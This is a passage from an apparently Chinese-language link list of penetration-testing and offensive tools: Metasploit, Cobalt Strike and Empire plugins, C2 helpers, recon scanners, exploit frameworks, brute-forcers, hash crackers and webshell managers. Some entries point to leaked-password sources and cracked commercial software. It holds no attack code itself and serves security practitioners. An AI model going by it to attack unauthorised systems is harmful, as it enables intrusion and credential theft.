- https://github.com/DanMcInerney/msf-netpwn 等待msf的session,并自动提为域管理 - https://www.exploit-db.com/exploits/45851/ msf插件,利用jira upm上传进行命令执行 - https://github.com/NullArray/AutoSploit 利用Shodan 搜索引擎收集目标, 并自动调用设定的msf模块对目标发动攻击 - https://github.com/WazeHell/metateta 使用msf脚本,根据特定协议进行扫描 - https://github.com/fbkcs/msf-elf-in-memory-execution Metasploit模块, 用于在内存中执行ELF文件 - https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit metasploit双星攻击利用文件 - https://github.com/darkoperator/Metasploit-Plugins msf扩展资产搜集与帮助插件 - https://github.com/D4Vinci/One-Lin3r metasploit、payload辅助查询工具 - https://github.com/shizzz477/msploitego 将msf数据库与maltego进行图形化展示 - https://github.com/scriptjunkie/msfgui metasploit的GUI界面,话说现在msf对windows支持也挺好的 #### CobaltStrike相关工具拓展插件 - https://mp.weixin.qq.com/s/CEI1XYkq2PZmYsP0DRU7jg 使用Aggressor脚本雕饰Cobalt Strike - https://github.com/rsmudge/armitage CobaltStrike社区版,调用msf,一对多带界面 - https://github.com/anbai-inc/CobaltStrike_Hanization CobaltStrike2.5汉化版,以msf库为基础,3.0以后改版 - https://github.com/rsmudge/cortana-scripts 用于cs2.x与armitage的可拓展插件,cvs3.x的为AggressorScripts - https://github.com/harleyQu1nn/AggressorScripts cs3.0以后的脚本搜集 - https://github.com/FortyNorthSecurity/AggressorAssessor cs3.x自动化攻击脚本集合 - https://github.com/Ridter/CS_Chinese_support/ cs3.0传输信息的汉化插件 - https://github.com/verctor/CS_xor64 生成cobaltstrike所需的xor64.bin - https://github.com/ryhanson/ExternalC2 一个用于将通信渠道与Cobalt Strike External C2服务器集成的库 - https://github.com/threatexpress/cs2modrewrite 用于将Cobalt Strike配置文件转换为mod_rewrite脚本的工具 - https://github.com/Mr-Un1k0d3r/CatMyFish 搜索分类域,为Cobalt Strike beacon C&C设置白名单域 - https://github.com/threatexpress/malleable-c2 利用jquery文件进行C2通讯,在文件内做了JS混淆绕过防火墙 - https://github.com/dcsync/pycobalt py3,Python API for Cobalt Strike - https://www.cobaltstrike.com/aggressor-script/cobaltstrike.html CobaltStrike相关插件编写,一对多带界面 #### Empire相关工具拓展插件 - https://paper.tuisec.win/detail/f3dce68a0b4baaa 利用Empire获取域控权限 - https://github.com/EmpireProject/Empire-GUI empire的node.js界面 - https://github.com/interference-security/empire-web empire的web界面 - https://github.com/byt3bl33d3r/DeathStar py3,调用Empire RESTful API 自动化获取域管权限的 - https://github.com/infosecn1nja/e2modrewrite 用于将Empire配置文件转换为Apache modrewrite脚本 - https://github.com/maxchehab/CSS-Keylogging Chrome扩展程序和Express服务器利用CSS的键盘记录功能。 - https://github.com/evilcos/cookiehacker Chrome扩展程序。JavaScript document.cookie / Wireshark Cookie - https://github.com/lfzark/cookie-injecting-tools Chrome扩展,cookie注入工具包括注入,编辑,添加和删除cookie ## 信息搜集 - https://github.com/smicallef/spiderfoot 利用OSINT自动化找出对方信息,gui界面,插件化 - https://github.com/Nhoya/gOSINT go,利用OSINT自动化搜集信息 - https://github.com/laramies/theHarvester 企业被搜索引擎收录敏感资产信息监控脚本:员工邮箱、子域名、Hosts - https://github.com/guelfoweb/knock 通过爆破进行子域名获取,可用于查找子域名接管漏洞 - https://github.com/aboul3la/Sublist3r 通过搜索引擎与爆破快速子域枚举工具 - https://github.com/Ice3man543/subfinder 基于go实现的Sublist3r - https://github.com/yanxiu0614/subdomain3 py3、py2的子域名,IP,CDN信息等 - https://github.com/caffix/amass 基于go,子域名枚举, 搜索互联网数据源, 使用机器学习猜测子域名 - https://github.com/nahamsec/lazyrecon 侦查reconnaissance过程自动化脚本, 可自动使用Sublist3r/certspotter获取子域名, 调用nmap/dirsearch等 - https://github.com/s0md3v/ReconDog simple,侦查信息的瑞士军刀 - https://github.com/FeeiCN/ESD py3,爆破搜集子域名 - https://github.com/alpha1e0/pentestdb 多用途集成化信息搜集工具 - https://github.com/se55i0n/PortScanner py2,目标tcp端口快速扫描、banner识别、cdn检测 - https://github.com/lijiejie/subDomainsBrute lijiejie开发的一款使用广泛的子域名爆破枚举工具 - https://github.com/ring04h/wydomain 猪猪侠开发的一款域名收集全面、精准的子域名枚举工具 - https://github.com/n4xh4ck5/N4xD0rk 利用搜索引擎来搜集子域名,可以使用西班牙语搜集 - https://github.com/vysec/DomLink py2,调用WHOXY.com,对邮箱和域名进行进一步的搜集 - https://github.com/jonluca/Anubis py3.6,子域名爆破与信息搜集 - https://github.com/le4f/dnsmaper web界面,子域名枚举爆破工具以及地图位置标记 - https://github.com/thewhiteh4t/seeker 获取高精度地理信息和设备信息的工具 - https://github.com/0xbug/orangescan web界面,的在线子域名信息收集工具 - https://github.com/TheRook/subbrute 扫描器中常用的子域名爆破API库 - https://github.com/We5ter/GSDF 基于谷歌SSL透明证书的子域名查询脚本 - https://github.com/mandatoryprogrammer/cloudflare_enum 利用CloudFlare的dns进行子域名枚举 - https://github.com/ultrasecurity/webkiller 渗透辅助,py,ip信息、端口服务指纹、蜜罐探测、bypass cloudflare - https://github.com/christophetd/CloudFlair cloudflare绕过,获取真实ip,集成censys - https://github.com/exp-db/PythonPool/tree/master/Tools/DomainSeeker 多方式收集目标子域名信息 - https://github.com/code-scan/BroDomain 子域名查询 - https://github.com/michenriksen/aquatone 子域名枚举、探测工具。可用于子域名接管漏洞探测 - https://github.com/chuhades/dnsbrute 基于go,高效的子域名爆破工具 - https://github.com/evilsocket/dnssearch 基于go,一款子域名爆破工具 - https://github.com/OJ/gobuster 基于go,根据dns查询子域名和web目录爆破的工具 - https://github.com/reconned/domained 可用于子域名收集的一款工具 - https://github.com/bit4woo/Teemo 多方式域名收集及枚举工具 - https://github.com/swisskyrepo/Subdomino 子域名枚举,端口扫描,服务存活确认 - https://github.com/nmalcolm/Inventus 通过爬虫实现的子域名收集工具 - https://github.com/alienwithin/OWASP-mth3l3m3nt-framework 渗透辅助,php,exp搜寻、payload与shell生产、信息搜集 - https://github.com/chrismaddalena/ODIN py3,simple,信息搜集与后期漏洞利用 - https://github.com/x0day/bannerscan C段/旁站查询与路径扫描 - https://github.com/Xyntax/BingC 基于Bing搜索引擎的C段/旁站查询,多线程,支持API - https://github.com/zer0h/httpscan 网段Web主机发现小工具 - https://github.com/lijiejie/BBScan 网站信息泄漏批量扫描脚本 - https://github.com/aipengjie/sensitivefilescan 网站敏感文件扫描工具 - https://github.com/Mosuan/FileScan 网站敏感文件扫描 / 二次判断降低误报率 / 扫描内容规则化 / 多目录扫描 - https://github.com/Xyntax/FileSensor 网站敏感文件探测工具 - https://github.com/ring04h/weakfilescan 多线程网站泄露信息检测工具 - https://github.com/Viralmaniar/Passhunt simple,用于搜索网络设备Web应用程序等的默认凭证。包含523个厂家的2084组默认密码 - https://github.com/yassineaboukir/Asnlookup simple,利用ASN搜索特定组织拥有ip,可联动nmap、masscan进行进一步信息扫描 ### 敏感信息泄露发现 - https://github.com/Yelp/detect-secrets PY,防止代码中的密码等相关敏感信息被提交到代码库中,可以在保证安全性的同时不会给开发者的生产力带来任何影响 - https://github.com/Acceis/leakScraper 处理和可视化大规模文本文件, 查找敏感信息, 例如证书 - https://github.com/Raikia/CredNinja 多线程用户凭证验证脚本,比如验证dump的hash是否属于此机器,利用445端口进行协议验证 - https://github.com/CERTCC/keyfinder 查找并分析私钥/公钥文件(文件系统中), 支持 Android APK 文件 - https://github.com/Ice3man543/hawkeye go,cli端,文件系统分析工具,快速查找文件内包含的SSH密钥,日志文件,Sqlite数据库,密码文件等 - https://github.com/FortyNorthSecurity/EyeWitness 获取目标网站截图、vnc、rdp服务,尝试获取默认凭证 - https://github.com/D4Vinci/Cr3dOv3r 根据邮箱自动搜索泄漏的密码信息,也可测试账户密码在各大网站能否登录的工具 ### 威胁情报分析 - https://www.databases.today,https://publicdbhost.dmca.gripe/,http://www.wttech.org/,https://hashes.org/leaks.php,https://archive.org/search.php?query= 密码泄露 - https://www.threatcrowd.org/ 威胁情报分析平台 - https://x.threatbook.cn/ 微步在线 | 威胁情报分析平台-ThreatBook-多引擎在线扫描、恶意软件在线检测 - https://github.com/needmorecowbell/sniff-paste 针对 Pastebin 的开源情报收集工具 - https://talosintelligence.com/documents/ip-blacklist 恶意IP地址 - https://ransomwaretracker.abuse.ch/downloads/RW_IPBL.txt 恶意软件IP地址 - https://check.torproject.org/cgi-bin/TorBulkExitList.py?ip=1.1.1.1 洋葱路由出口节点 - https://isc.sans.edu/api/threatlist/shodan shodan撒旦扫描器节点 - https://github.com/Te-k/harpoon 用于开源和威胁智能的CLI工具 - https://trumail.io/ 验证对方邮箱是否为垃圾邮箱,每个月可以免费验证1000次 - https://github.com/ChrisJohnRiley/Scythe 验证账号是否为常用账号 - https://github.com/fireeye/GeoLogonalyzer 远程身份验证地理位置分析工具,用于区分合法登录和恶意登录。 - https://github.com/target/strelka py3,通过实时扫描文件进行威胁情报分析和实时监测。 ### 托管云安全 - https://github.com/stuhirst/awssecurity/blob/master/arsenal.md AWS 安全检测相关的项目列表 - https://github.com/toniblyx/my-arsenal-of-aws-security-tools AWS安全工具集 - https://github.com/sa7mon/S3Scanner 扫描amazon公开的S3 buckets和dump - https://github.com/kromtech/s3-inspector 检测亚马逊AWS S3 bucket permissions - https://github.com/jordanpotti/AWSBucketDump 枚举AWS S3 buckets以查找敏感机密的文件 - https://github.com/sa7mon/S3Scanner 扫描amazon公开的S3 buckets和dump - https://github.com/kromtech/s3-inspector 检测亚马逊AWS S3 bucket permissions - https://github.com/jordanpotti/AWSBucketDump 枚举AWS S3 buckets以查找敏感机密的文件 - https://github.com/Netflix/repokid AWS 最低权限策略部署工具 - https://github.com/RhinoSecurityLabs/pacu AWS漏洞检测框架 - https://github.com/0xbug/Hawkeye GitHub 泄露监控系统 - https://github.com/neal1991/gshark github信息泄露检测 - https://github.com/VKSRC/Github-Monitor GitHub监控,代码信息泄露,分钟级监控,邮件预警 - https://github.com/metac0rtex/GitHarvester github Repo信息搜集工具 - https://github.com/repoog/GitPrey GitHub敏感信息扫描工具 - https://github.com/FeeiCN/GSIL py3,近实时监控Github敏感信息,并发送告警通知。 - https://github.com/UnkL4b/GitMiner github敏感内容挖掘 - https://github.com/dxa4481/truffleHog GitHub敏感信息扫描工具,包括检测commit等 - https://github.com/Hell0W0rld0/Github-Hunter github信息监测脚本 - https://github.com/awslabs/git-secrets 防止将敏感数据提交到 git 仓库的工具 - https://github.com/zricethezav/gitleaks 基于go的,检查git repo中的密码信息和密钥 ### 目录路径发现 - https://github.com/maurosoria/dirsearch 经典目录路径扫描 - https://github.com/TheM4hd1/PenCrawLer C#界面,web爬虫与目录路径爆破工具,除了常规扫描增加了递归爆破模式 - https://github.com/Xyntax/DirBrute 目录路径爆破工具 - https://github.com/abaykan/crawlbox 目录路径路径扫描器 - https://github.com/deibit/cansina 目录路径路径扫描器 - https://github.com/UltimateHackers/Breacher 多线程的后台路径扫描器,也可用于发现Execution After Redirect漏洞 - https://github.com/fnk0c/cangibrina 通过字典穷举、google、robots.txt等途径的跨平台后台管理路径扫描器 - https://github.com/Go0s/SitePathScan 基于协程的目录路径爆破工具,配合aiohttp扫描路径比之前快了三倍有余 - https://github.com/secfree/bcrpscan 基于爬虫的web路径扫描器 ### 本地文件包含漏洞 - https://github.com/hvqzao/liffy 本地文件包含漏洞利用工具 - https://github.com/D35m0nd142/Kadabra 本地文件包含漏洞扫描和利用工具 - https://github.com/P0cL4bs/Kadimus 本地文件包含漏洞扫描和利用工具 - https://github.com/D35m0nd142/LFISuite 本地文件包含漏洞利用及扫描工具,支持反弹shell - https://github.com/OsandaMalith/LFiFreak 本地文件包含漏洞利用及扫描工具,支持反弹shell ## 安全测试与扫描器框架 - https://github.com/zaproxy/zaproxy The OWASP ZAP core project出品的综合性渗透测试工具。由于其流量代理、请求重放和可扩展性拿来做模糊测试未尝不可 - https://github.com/x-Ai/BurpUnlimitedre burpsuite 1.7.27的永久破解版 - https://github.com/andresriancho/w3af 知名插件化扫描器 - https://github.com/juansacco/exploitpack 渗透测试集成框架,包含超过38,000+ exploits - https://github.com/Lucifer1993/AngelSword Web应用漏洞扫描框架,python3,300poc - https://github.com/Xyntax/POC-T 渗透测试插件化扫描框架,自带poc,并发扫描 - https://github.com/knownsec/Pocsuite 知道创宇维护的一个规范化POC/EXP利用框架 - https://github.com/leisurelicht/Pocsuite3 Pocsuite用py3重写 - https://github.com/Eitenne/roxysploit 漏洞利用框架,支持永恒之蓝直接利用 - https://github.com/TophantTechnology/osprey 斗象能力中心出品并长期维护的一个规范化POC/EXP利用框架 - https://github.com/he1m4n6a/btScan 大黑阔的插件化漏洞利用工具 - https://github.com/boy-hack/w9scan python下内置1200+插件可对网站进行一次规模的检测 - https://github.com/WooYun/TangScan 乌云维护的一个规范化POC/EXP利用框架 - https://github.com/n0tr00t/Beebeeto-framework Beebeeto是由众多安全研究人员所共同维护的一个规范化POC/EXP利用框架 - https://github.com/erevus-cn/pocscan 一款开源 Poc 调用框架,可轻松调用Pocsuite,Tangscan,Beebeeto,Knowsec老版本POC,可使用docker部署 - https://github.com/DavexPro/PocHunter 借鉴pocscan 的一款多利用框架poc适配框架 - https://github.com/theInfectedDrake/TIDoS-Framework 覆盖从侦察到漏洞分析的所有内容 - https://github.com/gyoisamurai/GyoiThon 使用深度学习的渗透测试工具, 从每次扫描数据中学习, 扫描越多, 软件检测精准度越高 - https://github.com/euphrat1ca/polar-scan 易语言的北极熊扫描器 - https://github.com/euphrat1ca/yeezy-scan 椰树1.9扫描器 - https://github.com/euphrat1ca/WebCruiserWVS 轻量级基于C#的扫描器,椰树扫描器的前身 - https://github.com/Skycrab/leakScan web界面,漏洞扫描 - https://github.com/az0ne/AZScanner web界面,自动漏洞扫描器,子域名爆破,端口扫描,目录爆破,常用框架漏洞检测 - https://github.com/boy-hack/w8scan web界面,基于bugscan扫描和架构思想的扫描器 - https://github.com/MiniSafe/microweb web界面,base bugscan,django - https://github.com/taipan-scanner/Taipan web界面,基于F#与C#的安全扫描器 - https://github.com/zhangzhenfeng/AnyScan web界面,python漏洞扫描器 - https://github.com/Canbing007/wukong-agent web界面,python漏洞扫描器 - https://github.com/dermotblair/webvulscan web界面,php,漏洞扫描器,支持输出pdf报告 - https://github.com/jeffzh3ng/InsectsAwake web界面,基于 Flask 应用框架的漏洞扫描系统,同时集成了渗透测试常用的端口扫描、子域名爆破等功能,后端漏洞扫描采用Pocsuite - https://github.com/0xInfection/TIDoS-Framework py,linux,网站扫描器 - https://github.com/secdec/adapt py,linux,网站扫描器 - https://github.com/sullo/nikto perl,linux,kali内置的网站扫描器 - https://github.com/Ekultek/Zeus-Scanner web扫描器,联动Geckodriver,nmap和sqlmap - https://github.com/blackye/lalascan 集合owasp top10漏洞扫描和边界资产发现能力的分布式web漏洞扫描框架 - https://github.com/blackye/BkScanner BkScanner 分布式、插件化web漏洞扫描器 - https://github.com/tlkh/prowler 一款基于Raspberry Pi Cluster 的网络漏洞扫描工具 - https://github.com/netxfly/passive_scan 基于http代理的web漏洞扫描器 - https://github.com/1N3/Sn1per php,自动化中间件扫描以及设备指纹识别 - https://github.com/Tuhinshubhra/RED_HAWK php,集成信息收集、漏洞扫描、指纹识别等的扫描工具 - https://github.com/m4ll0k/Spaghetti web应用扫描器,支持指纹识别、文件目录爆破、SQL/XSS/RFI等漏洞扫描,也可直接用于struts、ShellShock等漏洞扫描 - https://github.com/v3n0m-Scanner/V3n0M-Scanner 支持检测SQLi/XSS/LFI/RFI等漏洞的扫描器 - https://github.com/Yukinoshita47/Yuki-Chan-The-Auto-Pentest 集成子域名枚举、nmap、waf指纹识别等模块的web应用扫描器 - https://github.com/RASSec/pentestEr_Fully-automatic-scanner 定向自动测试工具 - https://github.com/Fireflyi/lcyscan py,插件化漏洞扫描器,支持生成报表 - https://github.com/Arachni/arachni Web应用漏洞扫描框架,支持REST、RPC等api调用 - https://github.com/swisskyrepo/DamnWebScanner 基于chrome/opera插件的被动式漏洞扫描 - https://github.com/0xsauby/yasuo ruby,扫描主机第三方web应用服务漏洞 - https://github.com/yangbh/Hammer Web应用漏洞扫描 - https://github.com/viraintel/OWASP-Nettacker 自动化渗透测试框架 - https://github.com/flipkart-incubator/watchdog 全面的web扫描器与漏洞利用工具 - https://github.com/Fplyth0ner-Combie/Bug-Project-Framework 易语言,模仿msf的漏洞利用框架,自带exp编辑器 - https://github.com/PowerScript/KatanaFramework py,模仿msf的漏洞利用框架,还有些ssh、压缩包破解工具 - https://github.com/m4ll0k/Galileo py2,网站扫描器 - https://github.com/samhaxr/hackbox py2,simple,网站扫描器 - https://github.com/secrary/EllaScanner py3,simple,被动式漏洞扫描,支持历史cve编号漏洞识别 - https://github.com/m4ll0k/WAScan py,simple,扫描页面/链接/脚本/Form, 测试Payload等 - https://github.com/jiangsir404/S7scan py,已用1,七种综合检测 - https://github.com/hatRiot/clusterd py,simple,web漏洞利用 - https://github.com/M4cs/BabySploit py,simple,模仿msf - https://github.com/iceyhexman/onlinetools simple,web界面,在线cms指纹识别|旁站|c段|信息泄露|工控|系统|物联网安全|cms漏洞扫描|端口扫描|等 - https://github.com/tulpar/tulpar simple,支持多种web漏洞扫描 - https://github.com/UltimateHackers/Striker simple,信息搜集、cms利用与漏扫,侦察绕过Cloudflare - https://github.com/0x4D31/salt-scanner 基于Salt Open以及Vulners Linux Audit API的linux漏洞扫描器,支持与JIRA、slack平台结合使用 - https://github.com/opensec-cn/kunpeng go,POC检测框架,以动态链接库的形式提供各种语言调用 ### 运维安全服务与资产管理 - https://github.com/chaitin/cloudwalker CloudWalker(牧云)服务器安全管理平台,逐步覆盖服务器资产管理、威胁扫描、Webshell 查杀、基线检测等功能。 - https://github.com/mitre/caldera mitre公司模拟攻击测试系统,主要是在win下 - https://github.com/guardicore/monkey 评估网络安全状况,分为扫描器与C2C服务器,利用默认口令与exp对ssh、smb等多种协议方式进行攻击检测 - https://github.com/grayddq/PublicSecScan 调用awvs对大量WEB资产进行分布式WEB安全扫描,发现web环境下常规的一些安全漏洞 - https://github.com/jeffzh3ng/Fuxi-Scanner 资产管理,漏洞检测集成awvs、创宇Pocsuite、nmap、hydra - https://github.com/infobyte/faraday 协作渗透测试和漏洞管理平台,集成多种 - https://github.com/DefectDojo/django-DefectDojo 基于django的漏洞资产管理平台 - https://github.com/creditease-sec/insight web界面,宜信安全部开发,集成应用系统资产管理、漏洞全生命周期管理、安全知识库管理三位一体的管理平台 - https://github.com/RASSec/A_Scan_Framework 漏洞管理、资产管理、任务扫描系统 - https://github.com/cea-sec/ivre 网络资产指纹发现,搭建属于自己的shodan与zoomeye - https://github.com/ysrc/xunfeng web界面,同程安全开发的网络资产识别引擎,漏洞检测引擎 - https://github.com/superhuahua/xunfengES web界面,base巡风开发,一个人的安全 - https://github.com/zhaoweiho/SecurityManageFramwork py3,django。企业内网安全管理平台,包含资产管理,漏洞管理,账号管理,知识库管、安全扫描自动化功能模块 - https://github.com/grayddq/PublicMonitors 对公网IP列表进行端口服务扫描,发现周期内的端口服务变化情况和弱口令安全风险。一个人的安全部 - https://github.com/grayddq/PubilcAssetInfo 主要目标是以甲方安全人员的视角,尽可能收集发现企业的域名和服务器公网IP资产。如百度云、阿里云、腾讯云等。一个人的安全部 - https://github.com/maya6/SiteScan web界面,py3 celery。资产收集 - https://github.com/ywolf/F-NAScan py2.6,网络资产、端口服务搜集整理,生成报表显示。快速 - https://github.com/flipkart-incubator/RTA 扫描公司内部所有在线设备, 提供整体安全视图, 标示所有安全异常 - https://github.com/0xbug/Biu-framework 企业内网基础服务安全扫描框架 ### 上传漏洞利用 - https://github.com/UltimateHackers/Arjun 扫描网页, 使用正则表达式爆破查找隐藏的GET/POST参数 - https://github.com/3xp10it/xupload 用于自动测试上传功能是否可上传webshell的工具 - https://github.com/gunnerstahl/JQShell py3,CVE-2018-9206 jQuery File Upload利用工具 - https://github.com/destine21/ZIPFileRaider burp插件,测试zip文件上传漏洞 - https://github.com/jpiechowka/zip-shotgun py,测试zip文件上传漏洞 ### 端口发现服务指纹识别 - https://github.com/nmap/nmap LUA,Nmap端口扫描器,具有有强大的脚本引擎框架 - https://github.com/robertdavidgraham/masscan C,无状态扫描,可以调用nmap进行指纹识别 - https://github.com/zmap/zmap C,无状态扫描,需要用C编写扩展模块 - https://github.com/zmap/zgrab go,基于zmap扫描器进行指纹识别、调度管理,可绕过CDN - https://github.com/chichou/grab.js 类似 zgrab 的快速 TCP 指纹抓取解析工具,支持更多协议 - https://github.com/johnnyxmas/scancannon shell,联动masscan和nmap - https://github.com/OffensivePython/Nscan 基于Masscan和Zmap的网络扫描器 - https://github.com/ring04h/wyportmap 调用nmap目标端口扫描+系统服务指纹识别 - https://github.com/angryip/ipscan Angry IP Scanner,跨平台界面化端口扫描器 - https://github.com/EnableSecurity/wafw00f WAF产品指纹识别 - https://github.com/rbsec/sslscan ssl类型识别 - https://github.com/urbanadventurer/whatweb web指纹识别 - https://github.com/Rvn0xsy/FastWhatWebSearch whatweb工具结果搜索平台 - https://github.com/tanjiti/FingerPrint web应用指纹识别 - https://github.com/nanshihui/Scan-T 网络爬虫式指纹识别 - https://github.com/ywolf/F-MiddlewareScan 中间件扫描服务识别 - https://github.com/lietdai/doom thorn上实现的分布式任务分发的ip端口漏洞扫描器 - https://github.com/RASSec/RASscan 端口服务扫描 - https://github.com/m3liot/shcheck 用于检查web服务的http header的安全性 - https://github.com/mozilla/ssh_scan 服务器ssh配置信息扫描 - https://github.com/18F/domain-scan 针对域名及其子域名的资产数据检测/扫描,包括http/https检测等 - https://github.com/ggusoft/inforfinder 域名资产收集及指纹识别工具 - https://github.com/0xbug/Howl 网络设备 web 服务指纹扫描与检索 - https://github.com/mozilla/cipherscan 目标主机服务ssl类型识别 - https://github.com/medbenali/CyberScan 渗透测试辅助工具,支持分析数据包、解码、端口扫描、IP地址分析等 - https://github.com/jekyc/wig web应用信息搜集工具 - https://github.com/eldraco/domain_analyzer 围绕web服务的域名进行信息收集和"域传送"等漏洞扫描,也支持针对背后的服务器端口扫描等 - https://github.com/cloudtracer/paskto 基于Nikto扫描规则的被动式路径扫描以及信息爬虫 - https://github.com/zerokeeper/WebEye 快速识别WEB服务器类型、CMS类型、WAF类型、WHOIS信息、以及语言框架 - https://github.com/n4xh4ck5/CMSsc4n CMS指纹识别 - https://github.com/HA71/WhatCMS CMS检测和漏洞利用脚本, 基于Whatcms.org API - https://github.com/boy-hack/gwhatweb CMS识别 python gevent实现 - https://github.com/wpscanteam/wpscan 基本算是word press下最好用的工具了 - https://github.com/swisskyrepo/Wordpresscan 基于WPScan以及WPSeku的优化版wordpress扫描器 - https://github.com/m4ll0k/WPSeku 精简的wordpress扫描工具 - https://github.com/rastating/wordpress-exploit-framework wordpress漏洞利用框架 - https://github.com/Jamalc0m/wphunter php,wordpress扫描器 - https://github.com/UltimateLabs/Zoom wordpress漏洞扫描器 - https://github.com/immunIT/drupwn Drupal 信息收集与漏洞利用工具 - https://github.com/CHYbeta/cmsPoc CMS渗透测试框架 - https://github.com/chuhades/CMS-Exploit-Framework CMS攻击框架 - https://github.com/Tuhinshubhra/CMSeeK 20多种CMS的基本检测,针对wp利用、可定制模块化爆破功能 - https://github.com/Dionach/CMSmap 支持WordPress,Joomla和Drupal扫描 - https://github.com/Moham3dRiahi/XAttacker Web CMS Exploit 工具,包含针对主流 CMS 的 66 个不同的 Exploits - https://github.com/code-scan/dzscan 首款集成化的Discuz扫描工具 ### 数据库扫描与爆破 - https://github.com/ron190/jsql-injection Java 编写的SQL注入工具 - https://github.com/shack2/SuperSQLInjectionV1 安恒航牛的一款界面化注入工具 - https://github.com/sqlmapproject/sqlmap sql注入sqlmap - https://github.com/stamparm/DSSS 已用1,99行代码实现的sql注入漏洞扫描器 - https://github.com/Hadesy2k/sqliv 已用1,基于搜索引擎的批量SQL注入漏洞扫描器 - https://github.com/quentinhardy/odat 一款专门用于Oracle渗透的很全面的工具 - https://github.com/m8r0wn/enumdb MySQL和MSSQL利用工具后期爆破、搜索数据库并提取敏感信息。 - https://github.com/LoRexxar/Feigong 针对各种情况自由变化的MySQL注入脚本 - https://github.com/youngyangyang04/NoSQLAttack 一款针对mongoDB的攻击工具 - https://github.com/Neohapsis/bbqsql SQL盲注利用框架 - https://github.com/NetSPI/PowerUpSQL 基于Powershell的sqlserver测试框架 - http://www.4hou.com/system/14950.html 利用PowerUpSQL,渗透测试技巧:绕过SQL Server登录触发器限制 - https://github.com/WhitewidowScanner/whitewidow 一款数据库扫描器 - https://github.com/stampery/mongoaudit MongoDB审计及渗透工具 - https://github.com/torque59/Nosql-Exploitation-Framework NoSQL扫描/爆破工具 - https://github.com/missDronio/blindy MySQL盲注爆破工具 - https://github.com/JohnTroony/Blisqy 用于http header中的时间盲注爆破工具,仅针对MySQL/MariaDB - https://github.com/se55i0n/DBScanner 自动扫描内网中常见sql、no-sql数据库脚本,包含未授权访问及常规弱口令检测 - https://github.com/Turr0n/firebase 对没有正确配置的firebase数据库进行利用 ### XSS跨站脚本检测利用 - https://github.com/UltimateHackers/AwesomeXSS XSS Awesome系列 - http://www.xss-payloads.com 很全面的xss工具包与资料 - https://github.com/ismailtasdelen/xss-payload-list XSS 漏洞Payload列表 - https://github.com/beefproject/beef 经典的xss利用框架 - https://github.com/samdenty99/injectify 类似beef的xss利用框架 - https://github.com/firesunCN/BlueLotus_XSSReceiver 蓝莲花战队为CTF打造的xss利用框架 - https://github.com/NytroRST/XSSFuzzer 根据特定标签生成xss payload - https://github.com/evilcos/xssor2 余弦写的xss利用辅助工具 - https://github.com/UltimateHackers/XSStrike 可识别并绕过WAF的XSS扫描工具 - https://github.com/raz-varren/xsshell go,利用xss漏洞返回一个js交互shell - https://github.com/UltimateHackers/JShell 利用xss漏洞返回一个js交互shell - https://github.com/shawarkhanethicalhacker/BruteXSS 一款XSS扫描器,可暴力注入参数 - https://github.com/1N3/XSSTracer 小型XSS扫描器,也可检测CRLF、XSS、点击劫持的 - https://github.com/0x584A/fuzzXssPHP PHP版本的反射型xss扫描 - https://github.com/chuhades/xss_scan 批量扫描XSS的python脚本 - https://github.com/BlackHole1/autoFindXssAndCsrf 自动化检测页面是否存在XSS和CSRF漏洞的浏览器插件 - https://github.com/shogunlab/shuriken 使用命令行进行XSS批量检测 - https://github.com/stamparm/DSXS 支持GET、POST方式的高效XSS扫描器 - https://github.com/bsmali4/xssfork kali下无法使用的话,请下载正确的PhantomJS到目录thirdparty/phantomjs/Linux - https://github.com/riusksk/FlashScanner flash xss扫描 - https://github.com/Damian89/xssfinder 针对检测网站中的反射XSS - https://github.com/BlackHole1/WebRtcXSS 自动化利用XSS入侵内网 ### 弱口令扫描爆破 - https://github.com/vanhauser-thc/thc-hydra 支持多种协议方式的破解与爆破,v8以后就不提供windows版本了 - https://github.com/nmap/ncrack c,支持多种协议的破解与爆破 - https://github.com/0pn1i9ht/F-Scrack ysrc对各类服务用户名密码爆破的脚本 - https://github.com/TunisianEagles/SocialBox 针对fb、gmail、ins、twitter的用户名密码爆破的脚本 - https://github.com/lanjelot/patator 支持多种协议的爆破,采用模块化设计,使用灵活 - https://github.com/m4ll0k/SMBrute 利用smb服务进行用户名密码爆破 - https://github.com/netxfly/crack_ssh Go写的协程版的ssh\redis\mongodb弱口令破解 - https://github.com/UltimateHackers/Blazy 支持测试 CSRF, Clickjacking, Cloudflare and WAF的弱口令探测器 - https://github.com/Moham3dRiahi/XBruteForcer WordPress、Joomla、DruPal、OpenCart、Magento等CMS用户密码爆破 - https://github.com/shengqi158/weak_password_detect Linux下利用nmap多线程探测ssh弱口令 - https://github.com/ztgrace/changeme 弱口令扫描器,不仅支持普通登录页,也支持ssh、mongodb等组件 - https://github.com/lijiejie/htpwdScan simple,http暴力破解、撞库攻击脚本 - https://github.com/scu-igroup/ssh-scanner 联动nmap、hydra对ssh批量爆破 ### 密码破解还原 - https://securityxploded.com/download.php 各种密码方向安全小工具 - https://github.com/bdutro/ibm_pw_clear IBM x3550/x3560 M3 bios密码清除重置工具 - https://github.com/thehappydinoa/iOSRestrictionBruteForce py,实现的 ios 访问限制密码破解工具 - https://github.com/hashcat/hashcat C,哈希破解 - https://github.com/fireeye/gocrack GO,基于hashcat 3.6.0+的分布式密码破解工具 - https://github.com/s3inlc/hashtopolis 基于php的hashcat的分布式破解工具,支持C#与python客户端 - https://github.com/e-ago/bitcracker 首款开源的BitLocker密码破解工具 - https://www.ru.nl/publish/pages/909282/draft-paper.pdf 破解SSD下使用BitLocker的论文 - https://github.com/magnumripper/JohnTheRipper 已知密文的情况下尝试破解出明文的破解密码软件 - https://github.com/shinnok/johnny JohnTheRipper密码破解的GUI界面,理论兼容所有功能,有windows界面 - https://github.com/jmk-foofus/medusa 支持的协议会比hydra少一点,但是某些速度会快 - https://github.com/MrSqar-Ye/wpCrack wordpress hash破解 - https://github.com/testsecer/Md5Decrypt C#,基于网上web API的MD5搜索工具 - https://github.com/s0md3v/Hash-Buster 能调用多个API进行hash破解查询的智能工具 - https://www.52pojie.cn/thread-275945-1-1.html ARCHPR Pro4.54绿色中文破解版。压缩包密码破解,利用“已知明文攻击”破解加密的压缩文件 ### 网站管理与webshell - http://www.bt.cn 宝塔网站管理系统 - https://github.com/AntSwordProject/antSword js,中国蚁剑,插件式开发 - https://github.com/Chora10/Cknife java,中国菜刀 - https://github.com/naozibuhao/SecQuanCknife java,中国菜刀升级版,增加爆破功能 - https://github.com/euphrat1ca/hatchet 中国大砍刀 - https://github.com/tengzhangchao/PyCmd py,一句话木马客户端程序,目前支持php、jsp,CS端通信加密 - https://github.com/epinna/weevely3 py,利用特定的一句话脚本对网站进行管理 - https://github.com/nil0x42/phpsploit 